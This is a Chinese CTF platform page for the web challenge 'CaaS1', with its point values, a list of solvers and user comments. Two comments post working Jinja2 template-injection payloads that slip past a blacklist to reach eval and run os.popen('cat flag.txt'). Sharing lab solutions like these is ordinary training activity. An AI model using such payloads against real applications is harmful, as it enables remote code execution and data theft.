CaaS1WEB 未解决
分数:
40
金币:
4
题目作者:
Aman
一 血:
Paradiso
一血奖励:
4金币
解 决:
63
提 示:
描 述:
CaaS1
其 他:
server.zip
评分(1)
解题动态

zhuyh69 攻破了该题 7小时前

姥姥 攻破了该题 2天前

chaio 攻破了该题 29天前

3229722202 攻破了该题 1月前

15325870583 攻破了该题 1月前

Oak123782 攻破了该题 1月前

td0756 攻破了该题 2月前

Hehe0619 攻破了该题 2月前

bugkuctfmike6 攻破了该题 2月前

caterpie771 攻破了该题 2月前

124要留就要77 攻破了该题 2月前

The-Beacon 攻破了该题 3月前

lzq2000 攻破了该题 3月前

SUSAN777 攻破了该题 3月前

yht111 攻破了该题 3月前

gaohaofeng 攻破了该题 3月前

a5580990 攻破了该题 4月前

TKar0 攻破了该题 4月前

llc123 攻破了该题 4月前

评论
124要留就要77 2月前
举报
name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag
baozongwi 10月前
举报
会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事
网络小钦 1年前
举报
看不懂啊
2552758573 1年前
举报
payload太长了,绕不过去
沐沐 2年前
举报
这个题什么意思
沐沐 1年前
举报
@cgxx 懂了 好玩这个题
cgxx 2年前
举报
模板注入